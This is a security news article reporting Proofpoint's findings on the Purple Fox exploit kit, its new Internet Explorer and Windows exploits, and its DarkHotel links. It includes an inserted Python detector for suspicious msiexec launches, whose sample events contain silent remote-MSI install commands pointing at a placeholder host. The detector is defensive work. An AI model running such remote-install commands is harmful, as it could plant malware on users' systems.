Purple Fox Exploit Kit Targets Vulnerabilities Linked to DarkHotel Group

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

Initially detailed in September 2018, the EK was designed for the distribution of the Purple Fox Trojan/Rootkit. Previously, the Trojan was being disseminated through the RIG EK, but its operators were likely looking to cut costs, Proofpoint’s security researchers note.

In recent distribution campaigns, the Purple Fox EK has been leveraging exploits targeting CVE-2020-0674 (a scripting engine memory corruption in Internet Explorer) and CVE-2019-1458 (a local privilege elevation in Windows), two vulnerabilities that Microsoft addressed in February 2020 and December 2019, respectively.

Before patches were released for these security bugs, however, both were observed being abused in attacks associated with the DarkHotel threat group, which is believed to be linked to the South Korean government. Last year, the threat actor also targeted a Chrome zero-day as part of Operation WizardOpium.

Purple Fox is believed to have affected tens of thousands of users, initially dropping crypto-miners onto compromised machines. Over time, however, it received several improvements, such as the addition of rootkit code and the recently added exploits.

Analysis of the infection chain has revealed the use of a script that first checks the operating system of the target machine in order to select the method for executing the next-stage payload (via msiexec.exe).

The script also attempts to elevate privileges using exploits for CVE-2018-8120 and CVE-2015-1701, two vulnerabilities in the Win32k multiuser driver. Recent versions of the script also include an exploit for CVE-2019-1458, Proofpoint reveals.
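The next-stage delivery described above (a script handing a package to msiexec.exe) leaves a recognisable trace in endpoint telemetry: an msiexec.exe process whose parent is a browser or script host, or whose command line points at a remote package. The following detection logic is an added example and is not from the article or from Proofpoint's research; the process-creation events, the placeholder URLs and the list of suspicious parent processes are constructed for illustration and should be tuned to the environment they are run in.

```python
"""Flag msiexec.exe launches that look like an exploit kit's next-stage
payload delivery: a remote MSI package, or msiexec spawned by a browser or
script host. All sample events below are constructed for this example."""
import ntpath
import re

# Parents from which an interactive msiexec launch is rarely legitimate.
# Assumption for this example: tune the set to your environment.
SUSPICIOUS_PARENTS = {
    "iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe",
    "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe",
}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)/(?:q|qn|quiet)\b", re.IGNORECASE)

# Constructed process-creation events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://placeholder.example/payload.msi /q"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": "msiexec /q /i https://placeholder.example/x.msi"},
    # A user double-clicking a downloaded installer: local path, explorer parent.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\setup.msi"},
    # The Windows Installer service starting itself: benign.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /V"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def analyze_event(event):
    """Return the reasons an event is suspicious (empty list if benign)."""
    if basename(event["image"]) != "msiexec.exe":
        return []
    cmd = event["cmdline"]
    parent = basename(event["parent"])
    reasons = []
    match = URL_RE.search(cmd)
    if match:
        reasons.append(f"remote package source: {match.group(0)}")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    # A silent-install flag on its own is normal; it only adds weight
    # once another indicator is present.
    if reasons and QUIET_RE.search(cmd):
        reasons.append("silent install flag")
    return reasons


def detect(events):
    """Run analyze_event over a stream of events and return the alerts."""
    alerts = []
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            alerts.append({"parent": basename(event["parent"]),
                           "cmdline": event["cmdline"],
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['parent']} -> {alert['cmdline']}")
        for reason in alert["reasons"]:
            print(f"         - {reason}")
```

Only the first two constructed events produce alerts; the locally launched installer and the service's own relaunch do not. In practice the same logic maps directly onto a SIEM query over process-creation events (Sysmon Event ID 1 or Windows Security 4688 with command-line auditing enabled), and the parent-process set is the knob that trades false positives for coverage.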

Although not as prevalent as they used to be, exploit kits remain part of the threat landscape and are regularly updated with exploits for more recent vulnerabilities to improve their effectiveness, which is what the Purple Fox EK developers are attempting as well.

The exploits added to the EK’s arsenal, however, target vulnerabilities that were addressed via security updates months ago, which underlines the importance of patching computers in a timely manner.

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business. In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism ‘in-house’ also enables greater control over what the EK actually loads,” Proofpoint also notes.

Related: Microsoft Patches IE Zero-Day, 98 Other Vulnerabilities

Related: Microsoft Patches Windows Zero-Day Exploited in Korea-Linked Attacks

Related: New ‘Lord’ Exploit Kit Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
